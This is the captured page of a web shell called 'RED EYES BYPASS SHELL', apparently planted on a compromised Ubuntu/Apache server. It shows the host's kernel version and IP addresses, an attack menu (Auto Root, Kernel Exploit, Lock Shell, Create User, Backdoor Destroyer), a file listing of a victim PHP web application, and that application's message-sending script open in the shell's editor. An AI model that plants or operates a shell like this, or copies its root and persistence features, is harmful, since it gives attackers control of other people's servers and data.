Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
app /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
bower_components
[ DIR ]
drwxr-xr-x
chart-pie
[ DIR ]
drwxr-xr-x
class
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
font-awesome
[ DIR ]
drwxr-xr-x
icon
[ DIR ]
drwxr-xr-x
img-banner
[ DIR ]
drwxr-xr-x
img-logo
[ DIR ]
drwxr-xr-x
img-new
[ DIR ]
drwxr-xr-x
img-slide
[ DIR ]
drwxr-xr-x
img-system
[ DIR ]
drwxr-xr-x
img-user
[ DIR ]
drwxr-xr-x
lightbox
[ DIR ]
drwxr-xr-x
modal
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
.htaccess
154
B
-rwxr-xr-x
about.php
4.15
KB
-rwxr-xr-x
category.php
11.37
KB
-rwxr-xr-x
check_login.php
424
B
-rwxr-xr-x
company.php
13.02
KB
-rwxr-xr-x
edit_service.php
4.65
KB
-rwxr-xr-x
footer.php
249
B
-rwxr-xr-x
header.php
766
B
-rwxr-xr-x
import_script.php
4.4
KB
-rwxr-xr-x
import_style.php
1.28
KB
-rwxr-xr-x
index.php
2.97
KB
-rwxr-xr-x
logout.php
77
B
-rwxr-xr-x
manage_service.php
4.46
KB
-rwxr-xr-x
menu_left.php
2.87
KB
-rwxr-xr-x
menu_main.php
88
B
-rwxr-xr-x
message.php
3.82
KB
-rwxr-xr-x
new.php
10.32
KB
-rwxr-xr-x
person.php
9.81
KB
-rwxr-xr-x
position.php
7.08
KB
-rwxr-xr-x
report.php
11.55
KB
-rwxr-xr-x
reportSale.php
4.55
KB
-rwxr-xr-x
sent.php
1.78
KB
-rwxr-xr-x
service.php
9.92
KB
-rwxr-xr-x
slide.php
10.61
KB
-rwxr-xr-x
type_user.php
549
B
-rwxr-xr-x
uploadImage.php
9.53
KB
-rwxr-xr-x
upload_img.php
793
B
-rwxr-xr-x
user.php
10.07
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sent.php
<?php session_start(); include('config/connect.php'); ?> <!doctype html> <html> <head> <meta charset="utf-8"> <title>Login</title> <script src="vendor/jquery/jquery.min.js"></script> <script src="vendor/jquery/sweetalert.min.js"></script> </head> <body> <?php if(isset($_POST['btnSent'])){ $message_user = $_POST['message_user']; $message_title = $_POST['message_title']; $message_detail = $_POST['message_detail']; $message_email = $_POST['message_email']; $message_save = date('Y-m-d H:i:s'); $message_status = "1"; $stmt = $conn->prepare("INSERT INTO tb_message(message_user, message_title, message_detail, message_email, message_save, message_status) VALUES (:message_user, :message_title, :message_detail, :message_email, :message_save, :message_status)"); $stmt->bindParam(':message_user', $message_user , PDO::PARAM_STR); $stmt->bindParam(':message_title', $message_title , PDO::PARAM_STR); $stmt->bindParam(':message_detail', $message_detail , PDO::PARAM_STR); $stmt->bindParam(':message_email', $message_email , PDO::PARAM_STR); $stmt->bindParam(':message_save', $message_save); $stmt->bindParam(':message_status', $message_status , PDO::PARAM_STR); $result = $stmt->execute(); if($result){ echo ' <script> swal({ title: "ส่งข้อความสำเร็จ", icon: "success", button: "ตกลง", }).then( () => { location.href = "index" }); </script> '; } else { echo ' <script> swal({ title: "Error เกิดข้อผิดพลาด", icon: "error", button: "ตกลง", }).then( () => { location.href = "'.$_SERVER['REQUEST_URI'].'" }); </script> '; } } ?> </body> </html>
Close